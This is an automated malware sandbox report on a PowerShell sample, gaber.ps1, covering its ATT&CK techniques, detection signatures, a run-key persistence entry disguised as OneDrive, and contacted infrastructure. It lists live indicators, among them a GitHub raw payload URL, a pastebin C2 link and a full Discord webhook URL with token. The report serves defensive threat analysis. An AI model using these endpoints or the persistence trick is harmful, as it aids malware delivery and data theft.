Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts111
Windows Management Instrumentation		11
Registry Run Keys / Startup Folder		11
Process Injection		131
Virtualization/Sandbox Evasion		OS Credential Dumping111
Security Software Discovery		Remote Services1
Archive Collected Data		1
Web Service		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
PowerShell		1
DLL Side-Loading		11
Registry Run Keys / Startup Folder		11
Process Injection		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable Media11
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
DLL Side-Loading		1
Obfuscated Files or Information		Security Account Manager131
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive1
Ingress Tool Transfer		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture3
Non-Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
File and Directory Discovery		SSHKeylogging14
Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials12
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1534103 Sample: gaber.ps1 Startdate: 15/10/2024 Architecture: WINDOWS Score: 84 37 pastebin.com 2->37 39 time.windows.com 2->39 41 4 other IPs or domains 2->41 49 Suricata IDS alerts for network traffic 2->49 51 Malicious sample detected (through community Yara rule) 2->51 53 Sigma detected: Suspicious PowerShell Parameter Substring 2->53 55 AI detected suspicious sample 2->55 8 powershell.exe 1 21 2->8         started        13 forfiles.exe 1 2->13         started        15 forfiles.exe 1 2->15         started        signatures3 57 Connects to a pastebin service (likely for C&C) 37->57 process4 dnsIp5 43 discord.com 162.159.137.232, 443, 49873, 49947 CLOUDFLARENETUS United States 8->43 35 C:\ProgramData\...\BeginSync.lnk, MS 8->35 dropped 61 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->61 63 Suspicious powershell command line found 8->63 65 Tries to open files direct via NTFS file id 8->65 67 Powershell creates an autostart link 8->67 17 conhost.exe 8->17         started        19 attrib.exe 1 8->19         started        21 powershell.exe 7 13->21         started        24 conhost.exe 1 13->24         started        26 powershell.exe 15->26         started        28 conhost.exe 1 15->28         started        file6 signatures7 process8 signatures9 59 Suspicious powershell command line found 21->59 30 powershell.exe 14 13 21->30         started        33 powershell.exe 26->33         started        process10 dnsIp11 45 raw.githubusercontent.com 185.199.108.133, 443, 49865, 49867 FASTLYUS Netherlands 30->45 47 pastebin.com 104.20.4.235, 443, 49854, 49860 CLOUDFLARENETUS United States 30->47

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
gaber.ps13%ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://nuget.org/NuGet.exe0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
https://go.micro0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://nuget.org/nuget.exe0%URL Reputationsafe
https://aka.ms/pscore680%URL Reputationsafe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
discord.com
162.159.137.232
truetrue
    		unknown
    raw.githubusercontent.com
    		185.199.108.133
    		truetrue
      		unknown
      pastebin.com
      		104.20.4.235
      		truetrue
        		unknown
        s-part-0032.t-0009.t-msedge.net
        		13.107.246.60
        		truefalse
          		unknown
          time.windows.com
          		unknown
          		unknowntrue
            		unknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txtfalse
              		unknown
              https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txtfalse
                		unknown
                http://pastebin.com/raw/sA04Mwk2false
                  		unknown
                  https://pastebin.com/raw/sA04Mwk2false
                    		unknown
                    https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2true
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1775797610.000001A9115B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1775797610.000001A9116F6000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://discord.compowershell.exe, 00000001.00000002.1750873547.000001A901765000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1883565122.0000024D90CAC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1943997837.000001D6014BB000.00000004.00000800.00020000.00000000.sdmptrue
                        		unknown
                        https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_powershell.exe, 0000000C.00000002.1943997837.000001D600BD6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1943997837.000001D600A9A000.00000004.00000800.00020000.00000000.sdmp, gaber.ps1true
                          		unknown
                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.1750873547.000001A901765000.00000004.00000800.00020000.00000000.sdmptrue
                          • URL Reputation: safe
                          		unknown
                          https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQpowershell.exe, 00000007.00000002.1883565122.0000024D9038D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1943997837.000001D600BD6000.00000004.00000800.00020000.00000000.sdmptrue
                            		unknown
                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.1750873547.000001A901765000.00000004.00000800.00020000.00000000.sdmptrue
                              		unknown
                              https://go.micropowershell.exe, 00000001.00000002.1750873547.000001A90258B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1883565122.0000024D8FD0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1943997837.000001D60050C000.00000004.00000800.00020000.00000000.sdmptrue
                              • URL Reputation: safe
                              		unknown
                              https://contoso.com/Licensepowershell.exe, 00000001.00000002.1775797610.000001A9116F6000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://contoso.com/Iconpowershell.exe, 00000001.00000002.1775797610.000001A9116F6000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://discord.com/powershell.exe, 00000001.00000002.1750873547.000001A901B8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1883565122.0000024D90DE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1943997837.000001D6015F1000.00000004.00000800.00020000.00000000.sdmptrue
                                		unknown
                                http://discord.compowershell.exe, 0000000C.00000002.1943997837.000001D6014BB000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.1750873547.000001A901765000.00000004.00000800.00020000.00000000.sdmptrue
                                    		unknown
                                    http://www.microsoft.coGIpowershell.exe, 00000007.00000002.1921937897.0000024DA7AF0000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://www.microso..ompowershell.exe, 00000001.00000002.1781186898.000001A919940000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://discord.com/api/webhooks/128545359042878powershell.exe, 00000007.00000002.1883565122.0000024D90CAC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1943997837.000001D6014BB000.00000004.00000800.00020000.00000000.sdmptrue
                                          		unknown
                                          https://0.discorpowershell.exe, 00000001.00000002.1750873547.000001A901B8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1883565122.0000024D90DE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1943997837.000001D6015F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://raw.githubusercontent.compowershell.exe, 00000007.00000002.1883565122.0000024D90326000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1943997837.000001D600B2A000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://contoso.com/powershell.exe, 00000001.00000002.1775797610.000001A9116F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1775797610.000001A9115B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1775797610.000001A9116F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://raw.githubusercontent.compowershell.exe, 00000007.00000002.1883565122.0000024D902F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1883565122.0000024D90326000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1943997837.000001D600AFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1943997837.000001D600B2A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		unknown
                                                http://www.microso.powershell.exe, 00000001.00000002.1781186898.000001A919940000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://aka.ms/pscore68powershell.exe, 00000001.00000002.1750873547.000001A901541000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1883565122.0000024D8F85D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1883565122.0000024D8F847000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1943997837.000001D600048000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1943997837.000001D60005E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1750873547.000001A901541000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1883565122.0000024D8F819000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1943997837.000001D600048000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://0.discord.com/powershell.exe, 00000001.00000002.1750873547.000001A901B8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1883565122.0000024D90DE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1943997837.000001D6015F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    http://pastebin.compowershell.exe, 00000007.00000002.1883565122.0000024D9025C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1883565122.0000024D90276000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1883565122.0000024D8FD0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1943997837.000001D600A60000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1943997837.000001D60050C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1943997837.000001D600A7C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://pastebin.compowershell.exe, 00000007.00000002.1883565122.0000024D9025C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1943997837.000001D600A6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		unknown

                                                        World Map of Contacted IPs

                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs

                                                        Public IPs

                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        104.20.4.235
                                                        		pastebin.comUnited States
                                                        		13335CLOUDFLARENETUStrue
                                                        162.159.137.232
                                                        		discord.comUnited States
                                                        		13335CLOUDFLARENETUStrue
                                                        185.199.108.133
                                                        		raw.githubusercontent.comNetherlands
                                                        		54113FASTLYUStrue

                                                        General Information

                                                        Joe Sandbox version:41.0.0 Charoite
                                                        Analysis ID:1534103
                                                        Start date and time:2024-10-15 15:52:08 +02:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 6m 3s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:17
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:gaber.ps1
                                                        Detection:MAL
                                                        Classification:mal84.troj.evad.winPS1@16/15@4/3
                                                        EGA Information:
                                                        • Successful, ratio: 50%
                                                        HCA Information:
                                                        • Successful, ratio: 84%
                                                        • Number of executed functions: 21
                                                        • Number of non-executed functions: 3
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .ps1

                                                        Warnings

                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                        • Excluded IPs from analysis (whitelisted): 13.95.65.251
                                                        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, twc.trafficmanager.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                        • Execution Graph export aborted for target powershell.exe, PID 7412 because it is empty
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                        • VT rate limit hit for: gaber.ps1

                                                        Simulations

                                                        Behavior and APIs

                                                        TimeTypeDescription
                                                        09:53:21API Interceptor390x Sleep call for process: powershell.exe modified
                                                        15:53:33AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
                                                        15:53:41AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"

                                                        Joe Sandbox View / Context

                                                        IPs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        104.20.4.235sostener.vbsGet hashmaliciousNjratBrowse
                                                        • pastebin.com/raw/V9y5Q5vv
                                                        sostener.vbsGet hashmaliciousXWormBrowse
                                                        • pastebin.com/raw/V9y5Q5vv
                                                        envifa.vbsGet hashmaliciousRemcosBrowse
                                                        • pastebin.com/raw/V9y5Q5vv
                                                        New Voicemail Invoice 64746w .jsGet hashmaliciousWSHRATBrowse
                                                        • pastebin.com/raw/NsQ5qTHr
                                                        Invoice Payment N8977823.jsGet hashmaliciousWSHRATBrowse
                                                        • pastebin.com/raw/NsQ5qTHr
                                                        Pending_Invoice_Bank_Details_XLSX.jsGet hashmaliciousWSHRATBrowse
                                                        • pastebin.com/raw/NsQ5qTHr
                                                        Pending_Invoice_Bank_Details_kofce_.JS.jsGet hashmaliciousWSHRATBrowse
                                                        • pastebin.com/raw/NsQ5qTHr
                                                        Update on Payment.jsGet hashmaliciousWSHRATBrowse
                                                        • pastebin.com/raw/NsQ5qTHr
                                                        162.159.137.2320CX5vBE7nr.exeGet hashmaliciousBabadeda, KDOT TOKEN GRABBERBrowse
                                                          SecuriteInfo.com.Trojan.PWS.Stealer.39881.18601.16388.exeGet hashmaliciousUnknownBrowse
                                                            WCA-Cooperative-Agreement.docx.exeGet hashmaliciousBabadeda, Exela Stealer, Python Stealer, Waltuhium GrabberBrowse
                                                              main.bat.bin.batGet hashmaliciousDiscord RatBrowse
                                                                Bootstrapper V1.19.exeGet hashmaliciousPython Stealer, Empyrean, Discord Token StealerBrowse
                                                                  https://buxb0t.github.io/https-www.instagram.com-reel-CtFCB1_MvyH-Get hashmaliciousHTMLPhisherBrowse
                                                                    http://bafybeid2klgyiphng6ifws5s35aor57wfi3so6koe2w4ggoacn6gqghegm.ipfs.dweb.link/Get hashmaliciousUnknownBrowse
                                                                      SecuriteInfo.com.Win64.Evo-gen.13899.14592.exeGet hashmaliciousUnknownBrowse
                                                                        https://mj.ostep.net/acknowledgementsGet hashmaliciousUnknownBrowse
                                                                          SecuriteInfo.com.Win32.MalwareX-gen.5836.3825.exeGet hashmaliciousUnknownBrowse

                                                                            Domains

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            discord.comcr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                            • 162.159.138.232
                                                                            Q1KaSJ8Fom.exeGet hashmaliciousUnknownBrowse
                                                                            • 162.159.135.232
                                                                            Q1KaSJ8Fom.exeGet hashmaliciousUnknownBrowse
                                                                            • 162.159.136.232
                                                                            0CX5vBE7nr.exeGet hashmaliciousBabadeda, KDOT TOKEN GRABBERBrowse
                                                                            • 162.159.137.232
                                                                            0CX5vBE7nr.exeGet hashmaliciousBabadeda, KDOT TOKEN GRABBERBrowse
                                                                            • 162.159.136.232
                                                                            cPl7CoJTBx.exeGet hashmaliciousLuna Grabber, Luna LoggerBrowse
                                                                            • 162.159.128.233
                                                                            SecuriteInfo.com.Win64.MalwareX-gen.20317.810.exeGet hashmaliciousUnknownBrowse
                                                                            • 162.159.138.232
                                                                            SecuriteInfo.com.Python.Muldrop.18.50.31694.exeGet hashmaliciousBlank GrabberBrowse
                                                                            • 162.159.138.232
                                                                            SecuriteInfo.com.Trojan.PWS.Stealer.39881.18601.16388.exeGet hashmaliciousUnknownBrowse
                                                                            • 162.159.136.232
                                                                            SecuriteInfo.com.Win64.Evo-gen.30154.6249.exeGet hashmaliciousUnknownBrowse
                                                                            • 162.159.135.232
                                                                            raw.githubusercontent.comcr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                            • 185.199.108.133
                                                                            na.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                            • 185.199.109.133
                                                                            na.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                            • 185.199.108.133
                                                                            oWARzPF1Ms.exeGet hashmaliciousPureLog StealerBrowse
                                                                            • 185.199.108.133
                                                                            oWARzPF1Ms.exeGet hashmaliciousPureCrypter, PureLog StealerBrowse
                                                                            • 185.199.108.133
                                                                            New PO-RFQ13101.xla.xlsxGet hashmaliciousFormBookBrowse
                                                                            • 185.199.110.133
                                                                            Upit 220062.xlsGet hashmaliciousRemcosBrowse
                                                                            • 185.199.108.133
                                                                            Swift Payment 20241014839374.vbsGet hashmaliciousRemcosBrowse
                                                                            • 185.199.111.133
                                                                            Image_Attachments.xlsGet hashmaliciousRemcosBrowse
                                                                            • 185.199.111.133
                                                                            Purchase Order.jsGet hashmaliciousAgentTeslaBrowse
                                                                            • 185.199.109.133

                                                                            ASNs

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            CLOUDFLARENETUSsteamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                                            • 162.159.138.232
                                                                            cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                            • 162.159.138.232
                                                                            HqvlYZC7Gf.exeGet hashmaliciousUnknownBrowse
                                                                            • 104.27.206.92
                                                                            https://e.cukurovadermatoloji.org.tr/i/Do-BbkmS8do2SSRbfKAqhcJT8K9iB0m-Get hashmaliciousUnknownBrowse
                                                                            • 162.159.134.42
                                                                            https://mayamabraidsweaveslocs.com/jndnnjnjvnjvdnvdnjnjn.htmlGet hashmaliciousUnknownBrowse
                                                                            • 1.1.1.1
                                                                            ordine.pdfGet hashmaliciousUnknownBrowse
                                                                            • 104.21.90.114
                                                                            ordine.pdfGet hashmaliciousHtmlDropperBrowse
                                                                            • 188.114.96.3
                                                                            order.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                            • 188.114.97.3
                                                                            https://www.google.com.tw/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bkartratraining.%E2%80%8Bco%C2%ADm%2Fcheckout%2Fchart%2Fgy87uy953g6gh8h55hx98uh/d2VzdG9uLmhpbnNvbkBhcmdvZ3JvdXB1cy5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                            • 104.17.25.14
                                                                            Factura.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                            • 188.114.96.3
                                                                            CLOUDFLARENETUScr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                            • 162.159.138.232
                                                                            HqvlYZC7Gf.exeGet hashmaliciousUnknownBrowse
                                                                            • 104.27.206.92
                                                                            https://e.cukurovadermatoloji.org.tr/i/Do-BbkmS8do2SSRbfKAqhcJT8K9iB0m-Get hashmaliciousUnknownBrowse
                                                                            • 162.159.134.42
                                                                            https://mayamabraidsweaveslocs.com/jndnnjnjvnjvdnvdnjnjn.htmlGet hashmaliciousUnknownBrowse
                                                                            • 1.1.1.1
                                                                            ordine.pdfGet hashmaliciousUnknownBrowse
                                                                            • 104.21.90.114
                                                                            ordine.pdfGet hashmaliciousHtmlDropperBrowse
                                                                            • 188.114.96.3
                                                                            order.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                            • 188.114.97.3
                                                                            https://www.google.com.tw/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bkartratraining.%E2%80%8Bco%C2%ADm%2Fcheckout%2Fchart%2Fgy87uy953g6gh8h55hx98uh/d2VzdG9uLmhpbnNvbkBhcmdvZ3JvdXB1cy5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                            • 104.17.25.14
                                                                            Factura.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                            • 188.114.96.3
                                                                            ordine.pdfGet hashmaliciousUnknownBrowse
                                                                            • 188.114.96.3
                                                                            FASTLYUSsteamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                                            • 185.199.111.133
                                                                            cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                            • 185.199.108.133
                                                                            https://www.google.com.tw/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bkartratraining.%E2%80%8Bco%C2%ADm%2Fcheckout%2Fchart%2Fgy87uy953g6gh8h55hx98uh/d2VzdG9uLmhpbnNvbkBhcmdvZ3JvdXB1cy5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                            • 151.101.1.229
                                                                            na.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                            • 185.199.109.133
                                                                            na.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                            • 185.199.108.133
                                                                            ordine.pdfGet hashmaliciousUnknownBrowse
                                                                            • 199.232.210.172
                                                                            Payment(Ssalazar)CQDM.htmlGet hashmaliciousUnknownBrowse
                                                                            • 151.101.65.229
                                                                            RicevutaPagamento_115538206.datGet hashmaliciousUnknownBrowse
                                                                            • 151.101.2.132
                                                                            V6QED2Q1WBYVOPEGet hashmaliciousUnknownBrowse
                                                                            • 151.101.67.6
                                                                            https://www.brstejtv.com/wsxGet hashmaliciousUnknownBrowse
                                                                            • 151.101.193.229

                                                                            JA3 Fingerprints

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            3b5074b1b5d032e5620f69f9f700ff0esteamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                                            • 185.199.108.133
                                                                            • 104.20.4.235
                                                                            • 162.159.137.232
                                                                            cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                            • 185.199.108.133
                                                                            • 104.20.4.235
                                                                            • 162.159.137.232
                                                                            https://www.google.com.tw/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bkartratraining.%E2%80%8Bco%C2%ADm%2Fcheckout%2Fchart%2Fgy87uy953g6gh8h55hx98uh/d2VzdG9uLmhpbnNvbkBhcmdvZ3JvdXB1cy5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                            • 185.199.108.133
                                                                            • 104.20.4.235
                                                                            • 162.159.137.232
                                                                            na.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                            • 185.199.108.133
                                                                            • 104.20.4.235
                                                                            • 162.159.137.232
                                                                            na.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                            • 185.199.108.133
                                                                            • 104.20.4.235
                                                                            • 162.159.137.232
                                                                            LISTA DE COTIZACIONES.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                            • 185.199.108.133
                                                                            • 104.20.4.235
                                                                            • 162.159.137.232
                                                                            https://doc.triadexport.in/sen43906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab9/?top=janice.atkins@faa.govGet hashmaliciousHTMLPhisherBrowse
                                                                            • 185.199.108.133
                                                                            • 104.20.4.235
                                                                            • 162.159.137.232
                                                                            PO-10-15-2024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 185.199.108.133
                                                                            • 104.20.4.235
                                                                            • 162.159.137.232
                                                                            https://landing-cs.mailcomms.io/73C4D162CAD9C4016A99EC5AF537DA57B4F5451828F0865A7DC8EA34ED2492F0Get hashmaliciousUnknownBrowse
                                                                            • 185.199.108.133
                                                                            • 104.20.4.235
                                                                            • 162.159.137.232
                                                                            https://www.filmize.art/azacGet hashmaliciousUnknownBrowse
                                                                            • 185.199.108.133
                                                                            • 104.20.4.235
                                                                            • 162.159.137.232

                                                                            Dropped Files

                                                                            No context

                                                                            Created / dropped Files

                                                                            C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Archive, ctime=Sat May 7 04:20:03 2022, mtime=Mon Sep 9 22:58:05 2024, atime=Sat May 7 04:20:03 2022, length=69632, window=hidenormalshowminimized
                                                                            Category:dropped
                                                                            Size (bytes):1728
